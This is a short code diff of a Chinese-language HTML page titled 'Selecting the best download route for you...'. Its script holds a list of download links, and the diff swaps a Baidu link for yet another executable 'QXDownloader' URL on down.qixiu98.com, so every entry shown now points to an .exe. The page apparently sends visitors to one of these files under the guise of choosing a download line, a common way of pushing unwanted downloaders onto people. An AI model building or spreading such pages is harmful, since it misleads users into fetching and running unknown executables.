--- a/ceshi.html
+++ b/ceshi.html
@@ -5,7 +5,7 @@
 <title>已为你选择最佳下载线路...</title>
 <script>
 function a(){
-var arr=["http://www.baidu.com",
+var arr=["http://down.qixiu98.com:83/QXDownloader_1997_71751.exe",
  "http://down.qixiu98.com:83/QXDownloader_1997_71618.exe",
  "http://down.qixiu98.com:83/QXDownloader_1997_71751.exe", 
  "http://down.qixiu98.com:83/QXDownloader_1997_71618.exe",
